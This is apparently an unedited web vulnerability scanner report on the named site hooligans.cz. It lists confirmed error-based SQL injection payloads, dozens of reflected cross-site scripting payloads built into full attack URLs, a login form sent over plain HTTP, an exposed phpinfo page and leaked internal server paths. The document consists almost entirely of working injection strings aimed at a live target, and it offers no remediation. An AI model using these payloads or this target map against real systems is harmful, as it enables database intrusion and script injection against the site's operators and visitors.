- SQL Injection
- Severity: Critical
- Confirmation: Confirmed
- Vulnerable URL: http://www.hooligans.cz/search.php?rsvelikost=sab&rstext=all-phpRS-all&rstema=(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))&stromhlmenu=44
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: rstema
- Parameter Type: Querystring
- Attack Pattern: (select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
- Severity: Critical
- Confirmation: Confirmed
- Vulnerable URL: http://www.hooligans.cz/search.php?rsvelikost=sab&rstext=all-phpRS-all&rstema=(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: rstema
- Parameter Type: Querystring
- Attack Pattern: (select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
- [High Possibility] SQL Injection
- Severity: Critical
- Confirmation: Confirmed
- Vulnerable URL: http://www.hooligans.cz/search.php?rsvelikost=sab&rstext=all-phpRS-all&rstema=%27&stromhlmenu=44
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: rstema
- Parameter Type: Querystring
- Attack Pattern: %27
- Severity: Critical
- Confirmation: Confirmed
- Vulnerable URL: http://www.hooligans.cz/search.php?rsvelikost=sab&rstext=all-phpRS-all&rstema=%27
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: rstema
- Parameter Type: Querystring
- Attack Pattern: %27
- Severity: Critical
- Confirmation: Confirmed
- Vulnerable URL: http://www.hooligans.cz/search.php?rsvelikost=sab&rstext=all-phpRS-all&rstema=44&stromhlmenu=%27
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: stromhlmenu
- Parameter Type: Querystring
- Attack Pattern: %27
- Severity: Critical
- Confirmation: Confirmed
- Vulnerable URL: http://www.hooligans.cz/?strana=%27
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: strana
- Parameter Type: Querystring
- Attack Pattern: %27
- Severity: Critical
- Confirmation: Confirmed
- Vulnerable URL: http://www.hooligans.cz/index.php?strana=%27
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: strana
- Parameter Type: Querystring
- Attack Pattern: %27
- ||| Password Transmitted Over HTTP
- Severity: Important
- Confirmation: Confirmed
- Vulnerable URL: http://www.hooligans.cz/galerie/login.php?referer=index.php?cat=46
- Vulnerability Classifications: PCI 6.5.9 OWASP A9 CWE-311 319
- Form target action: login.php?referer=index.php%3Fcat%3D46
- ||| XSS (Cross-site Scripting)
- Severity: Important
- Confirmation: Confirmed
- Vulnerable URL: http://www.hooligans.cz/view.php?cisloclanku='"--></style></script><script>alert(0x00141D)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: cisloclanku
- Parameter Type: Querystring
- Attack Pattern: '"--></style></script><script>alert(0x00141D)</script>
- Severity: Important
- Confirmation: Confirmed
- Vulnerable URL: http://www.hooligans.cz/search.php?rsvelikost="></script><script>alert(9)</script>&rstext=all-phpRS-all&rstema=44&stromhlmenu=44
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: rsvelikost
- Parameter Type: Querystring
- Attack Pattern: "></script><script>alert(9)</script>
- Severity: Important
- Confirmation: Confirmed
- Vulnerable URL: http://www.hooligans.cz/comment.php?akce=view&cisloclanku=2012050015'"--></style></script><script>alert(0x001482)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: cisloclanku
- Parameter Type: Querystring
- Attack Pattern: 2012050015'"--></style></script><script>alert(0x001482)</script>
- Severity: Important
- Confirmation: Confirmed
- Vulnerable URL: http://www.hooligans.cz/search.php?rsvelikost=sab&rstext='"--></style></script><script>alert(0x00149A)</script>&rstema=44&stromhlmenu=44
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: rstext
- Parameter Type: Querystring
- Attack Pattern: '"--></style></script><script>alert(0x00149A)</script>
- Severity: Important
- Confirmation: Confirmed
- Vulnerable URL: http://www.hooligans.cz/search.php?rsvelikost=sab&rstext=all-phpRS-all&rstema='"--></style></script><script>alert(0x0014B7)</script>&stromhlmenu=44
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: rstema
- Parameter Type: Querystring
- Attack Pattern: '"--></style></script><script>alert(0x0014B7)</script>
- Severity: Important
- Confirmation: Confirmed
- Vulnerable URL: http://www.hooligans.cz/rservice.php?akce=info&cisloclanku='"--></style></script><script>alert(0x0014DB)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: cisloclanku
- Parameter Type: Querystring
- Attack Pattern: '"--></style></script><script>alert(0x0014DB)</script>
- Severity: Important
- Confirmation: Confirmed
- Vulnerable URL: http://www.hooligans.cz/search.php?rsvelikost=sab&rstext=all-phpRS-all&rstema=44&stromhlmenu='"--></style></script><script>alert(0x0014D7)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: stromhlmenu
- Parameter Type: Querystring
- Attack Pattern: '"--></style></script><script>alert(0x0014D7)</script>
- Severity: Important
- Confirmation: Confirmed
- Vulnerable URL: http://www.hooligans.cz/search.php
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: rstext
- Parameter Type: Post
- Attack Pattern: '"--></style></script><script>alert(0x0015A4)</script>
- Severity: Important
- Confirmation: Confirmed
- Vulnerable URL: http://www.hooligans.cz/download.php?akce=detail&id_detail=8&sekce='"--></style></script><script>alert(0x00161F)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: sekce
- Parameter Type: Querystring
- Attack Pattern: '"--></style></script><script>alert(0x00161F)</script>
- Severity: Important
- Confirmation: Confirmed
- Vulnerable URL: http://www.hooligans.cz/search.php?rsvelikost=sab&rstext=all-phpRS-all&rstema="><script>alert(9)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: rstema
- Parameter Type: Querystring
- Attack Pattern: "><script>alert(9)</script>
- Severity: Important
- Confirmation: Confirmed
- Vulnerable URL: http://www.hooligans.cz/comment.php
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: cisloclanku
- Parameter Type: Post
- Attack Pattern: 2012050015'"--></style></script><script>alert(0x0016DD)</script>
- Severity: Important
- Confirmation: Confirmed
- Vulnerable URL: http://www.hooligans.cz/rservice.php
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: cisloclanku
- Parameter Type: Post
- Attack Pattern: '"--></style></script><script>alert(0x001758)</script>
- Severity: Important
- Confirmation: Confirmed
- Vulnerable URL: http://www.hooligans.cz/comment.php
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: cisloclanku
- Parameter Type: Post
- Attack Pattern: 2012050015'"--></style></script><script>alert(0x001797)</script>
- Severity: Important
- Confirmation: Confirmed
- Vulnerable URL: http://www.hooligans.cz/download.php?akce=sekce&sekce=2'"--></style></script><script>alert(0x001A7A)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: sekce
- Parameter Type: Querystring
- Attack Pattern: 2'"--></style></script><script>alert(0x001A7A)</script>
- Severity: Important
- Confirmation: Confirmed
- Vulnerable URL: http://www.hooligans.cz/ankety.php?akce=view&anketa=13'"--></style></script><script>alert(0x001AB5)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: anketa
- Parameter Type: Querystring
- Attack Pattern: 13'"--></style></script><script>alert(0x001AB5)</script>
- ||| phpinfo() Information Disclosure
- Severity: Low
- Confirmation: Confirmed
- Vulnerable URL: http://www.hooligans.cz/phpinfo.php
- Vulnerability Classifications: PCI 6.5.6 CAPEC-118 CWE-200 209
- ||| Database Error Message
- Severity: Low
- Confirmation: Confirmed
- Vulnerable URL: http://www.hooligans.cz/index.php?strana=%27
- Vulnerability Classifications: PCI 6.5.6 OWASP A6 CAPEC-118 CWE-200 209
- Parameter Name: strana
- Parameter Type: Querystring
- Attack Pattern: %27
- ||| MySQL Database Identified
- Severity: Information
- Confirmation: Confirmed
- Vulnerable URL: http://www.hooligans.cz/search.php?rsvelikost=sab&rstext=all-phpRS-all&rstema=(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))&stromhlmenu=44
- Vulnerability Classifications: -
- Parameter Name: rstema
- Parameter Type: Querystring
- Attack Pattern: (select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
- ||| [Possible] Internal Path Leakage (*nix)
- Severity: Information
- Confirmation: Confirmed
- Vulnerable URL: http://www.hooligans.cz/phpinfo.php
- Vulnerability Classifications: PCI 6.5.6 CAPEC-118 CWE-200 209
- Identified Internal Path(s):
- /usr/bin'
- /usr/sbin'
- /usr/share'
- /usr/include'
- /usr/lib64'
- /usr/libexec'
- /usr/com'
- /usr/share/man'
- /usr/share/info'
- /etc/php.d'
- /usr/share/file/magic.mime'
- /usr/sbin/apxs'
- /etc/php.ini
- /etc/php.d
- /etc/php.d/Fileinfo.ini,
- /etc/php.d/dbase.ini,
- /etc/php.d/dom.ini,
- /etc/php.d/gd.ini,
- /etc/php.d/imap.ini,
- /etc/php.d/ldap.ini,
- Severity: Information
- Confirmation: Confirmed
- Vulnerable URL: http://www.hooligans.cz/galerie/docs/
- Vulnerability Classifications: PCI 6.5.6 CAPEC-118 CWE-200 209
- Identified Internal Path(s):
- /usr/bin/X11/
- /etc/http/conf.d
- /var/my_images/
- Severity: Information
- Confirmation: Confirmed
- Vulnerable URL: http://www.hooligans.cz/galerie/docs/faq.htm
- Vulnerability Classifications: PCI 6.5.6 CAPEC-118 CWE-200 209
- Identified Internal Path(s):
- /tmp/phpezCYKr
- /tmp/#sql_45d5_0.MYI
- /etc/http/conf.d
- Severity: Information
- Confirmation: Confirmed
- Vulnerable URL: http://www.hooligans.cz/galerie/docs/index.htm
- Vulnerability Classifications: PCI 6.5.6 CAPEC-118 CWE-200 209
- Identified Internal Path(s):
- /usr/bin/X11/
- /etc/http/conf.d
- /var/my_images/